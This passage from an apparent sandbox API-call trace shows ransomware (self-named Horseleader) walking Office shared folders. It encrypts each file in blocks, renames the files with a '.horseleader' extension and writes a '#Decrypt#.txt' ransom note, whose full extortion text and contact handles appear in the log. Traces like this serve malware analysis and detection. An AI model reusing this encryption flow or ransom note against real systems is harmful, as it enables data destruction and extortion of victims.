hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8b778, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.254] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.261] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.261] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.261] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.261] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.262] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.262] CloseHandle (hObject=0x158) returned 1 [0245.262] GetProcessHeap () returned 0x780000 [0245.262] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.262] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL.horseleader") returned 83 [0245.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\serconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\serconv.dll.horseleader")) returned 1 [0245.263] GetProcessHeap () returned 0x780000 [0245.263] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.263] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xded68100, ftCreationTime.dwHighDateTime=0x1cb5970, ftLastAccessTime.dwLowDateTime=0xd68d72e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xded68100, ftLastWriteTime.dwHighDateTime=0x1cb5970, nFileSizeHigh=0x0, nFileSizeLow=0xc6b00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="USP10.DLL", cAlternateFileName="")) returned 1 [0245.264] lstrcmpiW (lpString1="USP10.DLL", lpString2="Windows") returned -1 [0245.264] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL") returned 69 [0245.264] StrStrIW (lpFirst="USP10.DLL", lpSrch=".horseleader") returned 0x0 [0245.264] lstrcmpW (lpString1="USP10.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.264] lstrcmpW (lpString1="USP10.DLL", lpString2="_uninstalling_.png") returned 1 [0245.264] lstrlenW (lpString=".testttjffg") returned 11 [0245.264] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL", lpSrch=".testttjffg") returned 0x0 [0245.264] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.264] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\usp10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL") returned 69 [0245.266] StrStrW (lpFirst="USP10.DLL", lpSrch=".txt") returned 0x0 [0245.266] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=813824) returned 1 [0245.266] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.266] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.269] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.269] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.269] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x60d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.269] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.272] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.272] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc1b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.272] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.274] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.275] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.275] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.275] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.275] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.275] CloseHandle (hObject=0x158) returned 1 [0245.275] GetProcessHeap () returned 0x780000 [0245.275] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.276] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL.horseleader") returned 81 [0245.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\usp10.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\usp10.dll.horseleader")) returned 1 [0245.277] GetProcessHeap () returned 0x780000 [0245.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.277] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, 
ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0xc150, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VBAJET32.DLL", cAlternateFileName="")) returned 1 [0245.277] lstrcmpiW (lpString1="VBAJET32.DLL", lpString2="Windows") returned -1 [0245.277] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL") returned 72 [0245.277] StrStrIW (lpFirst="VBAJET32.DLL", lpSrch=".horseleader") returned 0x0 [0245.277] lstrcmpW (lpString1="VBAJET32.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.277] lstrcmpW (lpString1="VBAJET32.DLL", lpString2="_uninstalling_.png") returned 1 [0245.277] lstrlenW (lpString=".testttjffg") returned 11 [0245.277] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL", lpSrch=".testttjffg") returned 0x0 [0245.277] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\vbajet32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.278] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL") returned 72 [0245.278] StrStrW (lpFirst="VBAJET32.DLL", lpSrch=".txt") returned 0x0 [0245.279] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=49488) returned 1 
[0245.279] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.281] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.281] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.282] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.283] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.283] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2150, lpOverlapped=0x0) returned 1 [0245.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.283] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2150, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2150, lpOverlapped=0x0) returned 1 [0245.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.284] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.284] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.284] CloseHandle (hObject=0x158) returned 1 [0245.284] GetProcessHeap () returned 0x780000 [0245.284] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.284] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL.horseleader") returned 84 [0245.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\vbajet32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\vbajet32.dll.horseleader")) returned 1 [0245.285] GetProcessHeap () returned 0x780000 [0245.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.285] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a84d00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x5e5e73d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14a84d00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0x23f90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="WISC30.DLL", cAlternateFileName="")) returned 1 [0245.285] lstrcmpiW (lpString1="WISC30.DLL", lpString2="Windows") returned 1 [0245.285] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL") returned 70 [0245.285] StrStrIW (lpFirst="WISC30.DLL", lpSrch=".horseleader") returned 0x0 [0245.286] lstrcmpW (lpString1="WISC30.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.286] lstrcmpW (lpString1="WISC30.DLL", lpString2="_uninstalling_.png") returned 1 [0245.286] lstrlenW (lpString=".testttjffg") returned 11 [0245.286] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL", lpSrch=".testttjffg") returned 0x0 [0245.286] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.286] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.286] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\wisc30.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL") returned 70 [0245.288] StrStrW (lpFirst="WISC30.DLL", lpSrch=".txt") returned 0x0 [0245.288] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=147344) returned 1 [0245.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.288] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.291] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.291] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.292] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf7c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.293] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.293] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.293] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.293] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ef90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.294] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.295] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.296] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.296] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.296] CloseHandle (hObject=0x158) returned 1 [0245.296] GetProcessHeap () returned 0x780000 [0245.296] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.296] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL.horseleader") returned 82 [0245.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\wisc30.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\wisc30.dll.horseleader")) returned 1 [0245.298] GetProcessHeap () returned 0x780000 [0245.298] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.298] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a84d00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x5e5e73d0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x14a84d00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0x23f90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WISC30.DLL", cAlternateFileName="")) returned 0 [0245.298] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.299] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\#Decrypt#.txt") returned 73 [0245.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.312] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.312] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.313] lstrlenA (lpString="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") returned 1368 [0245.313] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.313] CloseHandle (hObject=0x21c) returned 1 [0245.313] GetProcessHeap () returned 0x780000 [0245.313] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0245.313] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0245.313] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0245.313] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned 83 [0245.313] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0245.313] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0245.313] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform", 
